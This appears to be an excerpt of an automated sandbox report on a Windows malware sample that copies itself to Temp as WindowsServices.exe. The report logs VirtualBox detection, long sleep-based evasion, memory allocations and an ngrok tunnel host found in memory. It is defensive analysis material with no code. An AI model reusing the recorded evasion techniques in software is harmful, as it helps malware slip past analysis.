        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: VBoxS VBoxS 1_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: VBoxS VBoxS 5_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: VBoxS VBoxS 14_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: VBoxS VBoxS 18_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: VBoxS VBoxS 22_2_00405A10
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_1-2421
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_5-2420
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeFile opened: C:\myapp.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeFile opened: C:\myapp.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeFile opened: C:\myapp.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeFile opened: C:\myapp.exe
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeFile opened: C:\myapp.exe
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeMemory allocated: F30000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeMemory allocated: 2B80000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeMemory allocated: 4B80000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeMemory allocated: 62C0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeMemory allocated: 72C0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: CC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2D30000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 10D0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 6650000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 7650000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 78A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 88A0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 8B40000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 9B40000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: AB40000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: BB40000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: CB40000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 78A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 88A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 98A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 6650000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 9BE0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: ABE0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: D070000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: E070000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: F070000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 10070000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 11070000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: B0E0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 12070000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 13070000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 14070000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 15070000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 16070000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 16AC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 17AC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 18AC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 19AC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1AAC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1BAC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1CAC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1DAC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: C6E0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: D6E0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: E6E0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: F6E0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 106E0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 116E0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 126E0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 136E0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 146E0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: D460000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: E460000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: F460000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 10460000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 11460000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 12460000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 13460000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 14460000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1EAC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1FAC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 20AC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 21AC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 22AC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 23AC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 24AC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 25AC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 26AC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 27AC0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 28F60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: EFE0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: FFE0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 10FE0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 11FE0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 12FE0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 13FE0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 155A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 165A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 175A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 185A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 195A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1A5A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1B5A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1C5A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1D5A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1E5A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1F5A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 205A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: F4E0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 104E0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 114E0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 13120000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 14120000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 215A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 225A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 235A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 245A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 255A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 265A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 29F60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2AF60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2BF60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2CF60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: F8A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 13120000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2DF60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2EF60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2FF60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 30F60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 31F60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 32F60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 33F60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: F8A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: F8A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 34F60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 35F60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 36F60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 37F60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 38F60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 14220000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2AF60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 14220000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: BE0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2B10000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 10D0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: DD0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2BB0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 4BB0000 memory commit | memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: F30000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2C00000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: F30000 memory commit | memory reserve | memory write watch
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWindow / User API: threadDelayed 1327Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWindow / User API: threadDelayed 1175Jump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeDropped PE file which has not been started: C:\Users\user\Desktop\iR2UtZj5vP.exeJump to dropped file
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\WindowsServices.exeJump to dropped file
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeDropped PE file which has not been started: C:\Users\user\Desktop\iR2UtZj5vP.exex (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe TID: 8124Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe TID: 8128Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 7504Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 7612Thread sleep time: -663500s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 7612Thread sleep time: -587500s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 2168Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 6020Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 3392Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 3408Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 3528Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 996Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 7208Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: WindowsServices.exe, 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: VBoxServiceTrueTEMP'WindowsServices.exe#0.tcp.in.ngrok.io
        Source: WindowsServices.exe, 00000019.00000002.1920647174.0000000002C01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxService
